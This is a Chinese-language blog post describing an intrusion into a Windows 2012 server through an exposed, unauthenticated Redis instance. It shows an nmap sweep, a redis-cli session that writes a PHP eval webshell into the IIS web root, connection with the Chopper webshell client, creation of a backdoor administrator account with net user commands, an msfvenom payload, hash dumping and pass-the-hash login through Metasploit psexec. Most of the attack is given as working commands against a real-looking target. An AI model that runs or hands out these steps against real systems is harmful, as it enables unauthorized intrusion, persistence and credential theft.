通过redis快速渗透某2012服务器
1.扫描redis端口
MacPC:~ liuxin$ nmap -Pn -p6379 -sV XXX.XXX.XX.0/24 --open
Starting Nmap 6.47 ( https://nmap.org ) at 2015-07-15 21:33 CST
Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 2.4.5
2.2.远程连接redis
root@kaliPC:~# redis-cli -h XXX.XXX.XX.XX -p 6379
redis XXX.XXX.XXX.XX:6379> info
redis_version:2.4.5
redis_git_sha1:00000000
redis_git_dirty:0
arch_bits:32
multiplexing_api:winsock2
process_id:3640
uptime_in_seconds:1765597
uptime_in_days:20
lru_clock:1090432
used_cpu_sys:317.17
used_cpu_user:43.66
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
connected_clients:3
connected_slaves:0
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:1
used_memory:696880
used_memory_human:680.55K
used_memory_rss:696880
used_memory_peak:712564
used_memory_peak_human:695.86K
mem_fragmentation_ratio:1.00
mem_allocator:libc
loading:0
aof_enabled:0
changes_since_last_save:-2
bgsave_in_progress:0
last_save_time:1436865824
bgrewriteaof_in_progress:0
total_connections_received:79
total_commands_processed:767067
expired_keys:0
evicted_keys:0
keyspace_hits:10
keyspace_misses:354108
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
vm_enabled:0
role:master
3.寻找网站路径,判断系统类型
4.通过操作redis写入一句话
redis XXX.XXX.XXX.XX:6379> config set dir C:\inetpub\wwwroot\
OK
redis XXX.XXX.XXX.XX:6379> config set dbfilename test.php
OK
redis XXX.XXX.XXX.XX:6379> set fuck "<?php @eval($_POST[123]);?>"
OK
redis XXX.XXX.XXX.XX:6379> save
OK
5.使用菜刀连接一句话
5.上传大玛,获取mysql安装路径,开始提权
6.新建用户并加入管理员组
net user test test /add
net localgroup administrators test /add
7.远程登陆
7.利用msfvenom生成payload
8.上传到服务器并以管理员权限执行exe文件
9.DUMP PASSWORD HASHES
10.administrator用户的密码破解失败
11.由于已经获得HASH值,不破解也可以以administrator的身份登录
msf > use exploit/windows/smb/psexec 
© 走过岁月...... | Powered by LOFTER